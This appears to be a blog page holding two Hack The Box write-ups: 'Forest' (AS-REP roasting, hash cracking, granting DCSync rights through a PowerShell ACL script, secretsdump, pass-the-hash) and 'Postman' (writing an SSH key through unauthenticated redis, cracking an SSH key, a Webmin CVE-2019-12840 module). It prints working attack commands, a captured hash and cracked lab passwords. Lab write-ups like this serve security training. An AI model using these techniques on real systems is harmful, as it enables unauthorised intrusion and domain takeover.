Hack The Box - Forest Writeup

System Information

 



Initial Enumeration


It is a windows machine so we start using enum4linux

Domain name: HTB

Users:    
  • andy (Andy hislip)
  • lucinda (Lucinda Berger)
  • sebastien (Sebastien Caron)
  • mark (Mark Brandt)
  • santi (Santi Rodriguez)
  • ezra
  • Svc-alfresco


After some checks we can discover that svc-alfresco doesn't require Kerberos pre-authentication and therefore we can use a script from Impacket named GetNPUsers.py.
This scripts returns a TGT for the user even without knowing the password

# ./GetNPUsers.py  -request  -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d935a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d

The output $krb5asrep.... is compatbile with John and we can decrypt it with rockyou wordlist:

# john --wordlist=../../rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 24.38% (ETA: 03:58:12) 0g/s 334503p/s 334503c/s 334503C/s smf1180..smf,727
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:12 DONE (2019-11-04 03:57) 0.08176g/s 334072p/s 334072c/s 334072C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

# john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB:s3rvice

1 password hash cracked, 0 left

This gives us a password  s3rvice

We can discover shares using this account:

smbclient -L 10.10.10.161 -U "htb/svc-alfresco"
Enter HTB\svc-alfresco's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Failed to connect with SMB1 -- no workgroup available


Initial Foothold & User Flag


We can use WinRM to get access as svc-alfresco:

We can navigate to desktop and get the user flag:




Root Flag


Doing further enumeration we can discover that svc-alfresco user can add new user and also add them to some groups, like "Exchange Windows Permissions"
So I created and added a standard user.


net user nik Nik-1234 /add
net group "Exchange Windows Permissions" nik /ADD /DOMAIN
net localgroup "Remote Management Users" nik /ADD


Once logged as the new user with WinRM I used Sharphound to get all the information regarding Active directory and found a possible path to domain admins:



It seems that there is a path from my user to HTB.local domain using the permission Exchange Windows Permissions
This is explained in:
https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md

I used a command sequence:

$acl = get-acl "ad:DC=htb,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType

$acl.AddAccessRule($ace)

 Now the user nik has extended rights on the AD domain named Ds-Replication-Get-Changes-All (this means that this user can be used to replicate AD information, which also means that it has the rights to read all information from the AD domain) 
Then we can go back to impacket and used secretsdump to dump all hashes and tickets:

We don't need to crack any hash, we just can reuse the administrator hash with the wmiexec.py tool of impacket and get a shell:

And also the root flag
  


By - No comments:

Hack The Box - Postman Writeup

System Information



Initial Enumeration

Nmap scan show some services available:


  • Port 10000 is usually allocated and used by Webmin, a well-known web abblication where users can manage a Linux system
  • Port 6379 is used by redis server, an in-memory data store, that can be used as database, cache or messagebroker

My first check was to look for known vulnerabilities of webmin (there has been some in the past) but it seemed not vulnerable to any RCE or other remote vulnerability.
I also tried some bruteforcing of accounts but with no .result


Initial foothold

So my focus turned on redis.

According to an article of the author (http://antirez.com/news/96 and https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html), there is no security model in redis server.
It's up to the administrator to put security measures upstream (i.e. not exposing it to untrusted users, etc..) 

The articles also explain (in an obfuscated way) how to leverage some features/commands to write files into the server filesystem.

The next step for exploitation is understanding and trying to use the same commands  (maybe in different order).
First is to find the home folder of redis process: in Debian (and derivative distro) redis server is running as redis user and its home folder is /var/lib/redis

So the exploitation we can try is to write an SSH key of our choice in /var/lib/redis/.ssh/ with the filename authorized_keys
  
We can create an SSH key pair and put the public part in key.txt, while the private parte can be put in id_rsa

Next we can connect to redis with the client:

# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir "/var/lib/redis/.ssh"
1) "dir"
2) "/var/lib/redis/.ssh"
(0.70s)
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
(0.51s)
10.10.10.160:6379> save
OK
(1.04s)                             
10.10.10.160:6379>

The commands given above configure redis server such that the database is the file /var/lib/redis/.ssh/authorized_keys 

Then we can pass the public key to redis server that will save it in the "database" 
# cat key.txt | redis-cli  -h 10.10.10.160 -x set attack3
OK

# redis-cli  -h 10.10.10.160 save
OK

After this commands we should be able to logon the server using the private part of the key:

# ssh -i id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Nov  5 09:15:54 2019 from 10.10.15.223
redis@Postman:~$ uptime
 09:17:14 up 2 min,  2 users,  load average: 19.64, 8.00, 2.99
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)


And we are in the system as redis.

This foothold will disappear in a short time if someone else will exploit it the same way by overwriting  out SSH public key, or if someone resets the box (the filesystem will return to a clean state).

User flag


The next step is to enumerate to find a way to escalate to another use... Many ways (LinEnum, find, etc..).
We can find an RSA private key in /opt/id_rsa.bak



Unfortuantely we can't use it directly because it's encrypted but there is  tool names ssh2john.py that convert the key to a format that john the ripper can crack

When we have this key converted we can crack it with rockyou wordlist:

So the password is computer2008
We can use it to the login as Matt user and get the user flag:


Root Flag

User Matt is part of the adm group :

So let's try to login in webmin as Matt


This version of webmin is 1.910 and there is known vulnerability (CVE-2019-12840) that can be exlpoited to execute command by an authenticated user:


There is even a Metasploit module for this CVE named linux/http/webmin_packageup_rce
We can use it by putting the relevant variable

And then exploit getting a shell as the user that is running as webmin (since webmin is use to manage the system, it runs as root)



And we can then show the root flag:

By - No comments:
Subscribe to: Posts (Atom)